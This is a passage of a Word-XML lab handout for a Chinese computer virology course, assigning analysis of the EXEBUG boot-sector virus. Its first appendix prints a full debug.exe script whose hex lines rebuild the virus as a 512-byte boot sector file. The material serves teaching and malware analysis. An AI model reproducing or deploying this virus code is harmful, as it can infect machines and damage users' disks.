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C79" w:rsidRDefault="00EA6C79" w:rsidP="00EA6C79">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>计算机</w:t>
      </w:r>
      <w:r w:rsidRPr="00835401">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>病毒学</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA6C79" w:rsidRPr="00835401" w:rsidRDefault="00EA6C79" w:rsidP="00EA6C79">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835401">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="00E70B74">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00546D79">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EXEBUG病毒分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA6C79" w:rsidRDefault="00EA6C79" w:rsidP="00EA6C79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B8A7943" wp14:editId="6A5AE3E4">
            <wp:extent cx="5274310" cy="52743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-virus_318-4723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79" w:rsidRDefault="00EA6C79" w:rsidP="00EA6C79"/>
    <w:p w:rsidR="00EA6C79" w:rsidRDefault="00EA6C79" w:rsidP="00EA6C79"/>
    <w:p w:rsidR="00EA6C79" w:rsidRDefault="00EA6C79" w:rsidP="00EA6C79">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00761C4D" w:rsidRDefault="00761C4D" w:rsidP="00761C4D">
      <w:pPr>
        <w:jc w:val="center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学号：0x091395</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761C4D" w:rsidRDefault="00761C4D" w:rsidP="00761C4D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia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姓名：uknowho</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146E1F" w:rsidRDefault="00146E1F">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00146E1F" w:rsidRPr="00146E1F" w:rsidRDefault="00146E1F" w:rsidP="00146E1F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00146E1F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C623C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>熟悉EXEBUG病毒数据结构。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C623C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>掌握EXEBUG病毒源程序分析。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146E1F" w:rsidRPr="00146E1F" w:rsidRDefault="00C623C3" w:rsidP="00C623C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>进一步掌握debug工具软件的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00146E1F" w:rsidRPr="00146E1F" w:rsidRDefault="00146E1F" w:rsidP="00146E1F">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00146E1F">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="00C623C3" w:rsidP="006F0110">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 给出了EXEBUG病毒数据生成批处理文件的编写方法，附录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 给出了EXEBUG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒源程序分析范例。其它内容请参考教材.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="00146E1F" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2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实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从实验文档中获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exebug/genb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒代码，生成一个病毒代码文件，例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exebug-data.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3"/>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、把病毒代码整理成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>debug.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的批处理文件，例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exebug.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3"/>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>debug.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的批处理文件，指令格式为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3"/>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:t>debug&lt;exebug.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3"/>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行完后可以在当前目录下获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exebug/genb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒代码文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hdboot.dat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3"/>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、利用反编译软件等处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hdboot.dat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以获得病毒代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="006D66C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照上述方法，看懂</w:t>
      </w:r>
      <w:r w:rsidRPr="006D66C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EXEBUG</w:t>
      </w:r>
      <w:r w:rsidRPr="006D66C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒源程序，写出源程序注释，必要的时候画出程序工作流程图与内存占用分析图表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00217660" w:rsidRPr="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRDefault="00112CF4" w:rsidP="00C623C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112CF4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">附录1 </w:t>
      </w:r>
      <w:r w:rsidR="00C623C3" w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXEBUG病毒数据生成批处理文件的编写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C623C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0100 EB 1C 90 4B 49 44 4C 20 20 20 20 00 02 01 01 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0110 02 E0 00 28 0B F0 09 00 12 00 02 00 00 00 FA 33 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0120 C0 8E D8 8E D0 BC 00 7C 8B F4 FB C4 06 4C 00 A3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0130 07 7C 8C 06 09 7C A1 13 04 48 48 B1 06 A3 13 04 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0140 D3 E0 8E C0 B9 00 02 33 FF FC F3 A4 B8 88 00 06 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0150 50 CB 1E 50 F6 C2 F0 75 28 D0 EC FE CC 75 22 33 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0160 C0 8E D8 A1 6C 04 8A C4 2E 2A 06 03 00 3C 02 72 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0170 10 2E 88 26 03 00 3D 02 00 73 03 E8 CC 00 E8 E8 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0180 00 58 1F 2E FF 2E 07 00 33 C0 8E C0 CD 13 0E 1F </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0190 80 3E 0B 00 00 74 24 BE AE 01 83 C6 10 80 3C 80 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 01A0 75 F8 8B 14 8B 4C 02 BB 00 7C B8 01 02 CD 13 72 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 01B0 D7 2E C7 06 48 01 C0 07 EB 7B 90 B2 80 E8 A9 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 01C0 BF 18 00 8B 45 F9 B9 04 00 D3 E8 8B E8 8B 45 FE </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 01D0 D1 E0 40 03 E8 F6 35 8A CC FE C1 33 D2 8A F0 BB </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 01E0 00 05 B8 01 02 CD 13 72 F9 8B C5 BE 34 00 B7 07 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 01F0 F6 35 33 C9 86 E1 2B F1 F6 75 02 8B D0 86 D5 8A </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0200 05 2A C1 FE C1 B4 02 50 CD 13 58 72 F8 B1 01 02 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0210 F8 02 F8 8B 05 FE C6 3A 75 02 72 04 B6 00 FE C5 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0220 2B F0 73 E1 03 C6 B4 02 CD 13 8A 6D FD 8B DD C7 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0230 06 48 01 70 00 33 C0 A2 0B 00 8E D8 B0 52 A3 4C </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0240 00 8C 0E 4E 00 EA 00 00 70 00 BB FF FF B0 B6 E6 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0250 43 89 D8 E6 42 88 E0 E6 42 E4 61 0C 03 E6 61 4B </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0260 B9 64 00 E2 FE EB EA 5B C3 53 51 52 06 56 57 0E </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0270 1F 0E 07 BB 00 02 B9 01 00 32 F6 B8 01 02 9C FF </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0280 1E 07 00 72 22 C7 07 EB 1C 80 FA 80 75 04 88 16 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 0290 0B 02 FC B9 A0 01 BE 1E 00 BF 1E 02 F3 A4 B8 01 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 02A0 03 41 9C FF 1E 07 00 5F 5E 07 5A 59 5B C3 20 49 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 02B0 20 61 6D 20 4C 69 20 58 69 62 69 6E 21 0D 0A 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t xml:space="preserve">e 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 AA </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t>n hdboot.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t>r bx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t>r cx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t>0200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00C623C3" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t>w 0100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C623C3" w:rsidRPr="00112CF4" w:rsidRDefault="00C623C3" w:rsidP="00C6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 w:rsidRPr="00C623C3">
        <w:t>q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRDefault="00146E1F" w:rsidP="006D66C3">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112CF4">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">附录2  </w:t>
      </w:r>
      <w:r w:rsidR="00C623C3" w:rsidRPr="00C623C3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>EXEBUG病毒源程序分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D66C3" w:rsidRPr="006D66C3" w:rsidRDefault="006D66C3" w:rsidP="006D66C3">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D66C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>一、主板加载数据分析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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F35590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
